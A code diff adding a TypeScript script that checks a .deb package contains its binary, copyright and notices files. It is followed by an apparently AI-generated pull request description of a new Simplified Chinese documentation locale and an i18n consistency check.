+  const [dpkgCode, tarCode] = await Promise.all([
+    once(dpkg, "close").then(([code]) => code as number | null),
+    once(tar, "close").then(([code]) => code as number | null),
+  ]);
+
+  // The producer's status is checked too: dpkg-deb failing on a corrupt archive
+  // still closes the pipe, which tar reports as a clean end-of-input, so
+  // ignoring it would turn an unreadable package into an empty extraction.
+  if (dpkgCode !== 0) {
+    throw new Error(`dpkg-deb could not read the package (exit ${dpkgCode})`);
+  }
+  if (tarCode !== 0) {
+    throw new Error(`could not extract ${member} from the package (tar exit ${tarCode})`);
+  }
+
+  const content = Buffer.concat(chunks).toString("utf-8");
+  // tar exits 0 when asked for a member that does not match anything, so an
+  // empty result is the only signal distinguishing "absent" from "empty file".
+  if (content === "") {
+    throw new Error(`extracted ${member} from the package but it was empty`);
+  }
+  return content;
+}
+
+async function main(): Promise<void> {
+  const arg = process.argv[2];
+  if (!arg) {
+    console.error("Usage: bun run scripts/verify-deb.ts <path-to-.deb>");
+    process.exit(1);
+  }
+  const debPath = resolveDebPath(arg, process.cwd());
+
+  const { stdout } = await execFileAsync("dpkg-deb", ["--contents", debPath], {
+    maxBuffer: 64 * 1024 * 1024,
+  });
+  const entries = parseDebContents(stdout);
+
+  const problems = findContentProblems(entries);
+  if (problems.length === 0) {
+    const copyright = await readMember(debPath, COPYRIGHT_PATH);
+    problems.push(...findMarkerProblems(COPYRIGHT_PATH, copyright, COPYRIGHT_MARKERS));
+    const notices = await readMember(debPath, NOTICES_PATH);
+    problems.push(...findMarkerProblems(NOTICES_PATH, notices, NOTICES_MARKERS));
+  }
+
+  if (problems.length > 0) {
+    console.error(`✗ ${arg}: package contents are incomplete:`);
+    for (const p of problems) {
+      console.error(`  - ${p}`);
+    }
+    process.exit(1);
+  }
+
+  console.log(`✓ ${arg}: ships ${BINARY_PATH}, ${COPYRIGHT_PATH}, ${NOTICES_PATH}`);
+}
+
+if (import.meta.main) {
+  main().catch((err: unknown) => {
+    console.error(`verify-deb: ${err instanceof Error ? err.message : String(err)}`);
+    process.exit(1);
+  });
+}


### PR DESCRIPTION
## Summary

Adds Simplified Chinese (zh-CN) as a third documentation language across both surfaces:

- **Root/docs pairs** — `*.zh.md` siblings for all eight translated documents (README, SECURITY_CHECKLIST, architecture, and the five specifications), with three-way cross-language links updated in the existing EN/JA files.
- **Docs site** — a `zh` Starlight locale (27 pages mirroring `ja/`), registered in `astro.config.ts` with translated sidebar labels. `astro build` renders all 82 pages including the 27 zh ones.
- **Rules** — `.claude/rules/markdown.md` and `docs-i18n.md` updated to the three-language scheme.

## Enforcement (not just documentation)

New `scripts/check-markdown-i18n.ts`, wired into `check:all` and the CI lint job as `check:i18n`:

- Root/docs: derives the translation set from existing siblings — a base `.md` with any translation must have all of them, in both directions (no hardcoded lists; standalone files like CONTRIBUTING.md stay exempt naturally).
- Docs site: the `ja/` and `zh/` trees must mirror the default-locale tree exactly (detects both missing pages and orphans).
- Cross-language links required in the first lines of every triplet member.
- 25 unit tests (`check-markdown-i18n.test.ts`); npm suite now 181 passing.

## Quality

Translations were produced per-section and then cross-reviewed for terminology consistency (worktree/hook/trust etc. verified uniform across all 35 files), structural parity (heading/fence/table counts match EN exactly), link integrity (`/zh/` prefixes, anchors resolved via slugger), and Simplified-vs-Traditional purity. Seven cross-reference links pointing at EN files instead of `.zh.md` siblings were caught and fixed in review.

Also catches `ja/index.mdx` up with the English page (shell-integration lines and trailing note), which the translation pass surfaced.

## Dependency

Branched from #566 so that `zh/installation.mdx` includes the `.deb` documentation paragraph; merge #566 first — this PR's diff then reduces to the i18n work only.

`pnpm run check:all` (including the new `check:i18n`) passes end-to-end.

🤖 Generated with [Claude Code](https://claude.com/claude-code)